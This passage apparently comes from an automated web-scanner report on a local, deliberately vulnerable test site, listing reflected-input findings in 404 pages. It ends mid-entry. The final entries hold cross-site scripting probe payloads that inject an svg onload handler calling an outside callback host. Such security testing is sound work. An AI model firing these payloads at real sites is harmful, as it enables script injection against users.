Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities9irodwy9z8/javascript/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities9irodwy9z8/javascript/source/ was not found on this server.</p>
...[SNIP]...
19.171. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascriptqoop882ofx/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascriptqoop882ofx/source/ was not found on this server.</p>
...[SNIP]...
19.172. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascript/sourceam62av3cbv/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascript/sourceam62av3cbv/ was not found on this server.</p>
...[SNIP]...
19.173. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesyigyr51i5e/sqli/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesyigyr51i5e/sqli/ was not found on this server.</p>
...[SNIP]...
19.174. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqlilaqyyjfq4r/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqlilaqyyjfq4r/ was not found on this server.</p>
...[SNIP]...
19.175. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesttmr12s3ho/sqli/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesttmr12s3ho/sqli/help/ was not found on this server.</p>
...[SNIP]...
19.176. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli2l5ic9f67n/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli2l5ic9f67n/help/ was not found on this server.</p>
...[SNIP]...
19.177. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli/helpq05gjmsmp3/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:14 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli/helpq05gjmsmp3/ was not found on this server.</p>
...[SNIP]...
19.178. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesu9od4a97rw/sqli/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesu9od4a97rw/sqli/source/ was not found on this server.</p>
...[SNIP]...
19.179. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli6aehfni02o/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli6aehfni02o/source/ was not found on this server.</p>
...[SNIP]...
19.180. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli/source4bt5olp81y/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli/source4bt5olp81y/ was not found on this server.</p>
...[SNIP]...
19.181. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesse18i5hxqs/sqli_blind/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:37 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesse18i5hxqs/sqli_blind/ was not found on this server.</p>
...[SNIP]...
19.182. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blinda85e782qfp/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blinda85e782qfp/ was not found on this server.</p>
...[SNIP]...
19.183. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesjro5u3i1xq/sqli_blind/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesjro5u3i1xq/sqli_blind/help/ was not found on this server.</p>
...[SNIP]...
19.184. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blindoou2cd0g65/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blindoou2cd0g65/help/ was not found on this server.</p>
...[SNIP]...
19.185. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blind/helpxtcjajkdx0/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blind/helpxtcjajkdx0/ was not found on this server.</p>
...[SNIP]...
19.186. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiestymkvvcwlf/sqli_blind/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiestymkvvcwlf/sqli_blind/source/ was not found on this server.</p>
...[SNIP]...
19.187. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blind68diq4aq9x/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blind68diq4aq9x/source/ was not found on this server.</p>
...[SNIP]...
19.188. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/sqli_blind/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/sqli_blind/sourcexsbrcttd52/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blind/sourcexsbrcttd52/ was not found on this server.</p>
...[SNIP]...
19.189. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//6v29lsi0ixbtnro40hpfroygq7w2k6muek2buykm9%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//6v29lsi0ixbtnro40hpfroygq7w2k6muek2buykm9\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.190. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//iwilm4jcj9c5o3pg1tqrs0zsrjxelin6fw3tqje8%5c56burpcollaborator.net'%3e/vulnerabilities/view_help.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 427
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//iwilm4jcj9c5o3pg1tqrs0zsrjxelin6fw3tqje8\56burpcollaborator.net'&gt;/vulnerabilities/view_help.php was not found on this server.</p>
...[SNIP]...
19.191. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//hrckh3ebe874j2kfwslqnzurmisdghi5avyslj98%5c56burpcollaborator.net'%3e/view_help.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 416
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//hrckh3ebe874j2kfwslqnzurmisdghi5avyslj98\56burpcollaborator.net'&gt;/view_help.php was not found on this server.</p>
...[SNIP]...
19.192. http://localhost/examplewebiste/vulnerabilities/view_help.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/view_help.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fmsipi8fgfd89k7lkxxmvo4vwnntihmjab0zumlaa%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 432
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/view_help.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//msipi8fgfd89k7lkxxmvo4vwnntihmjab0zumlaa\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.193. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

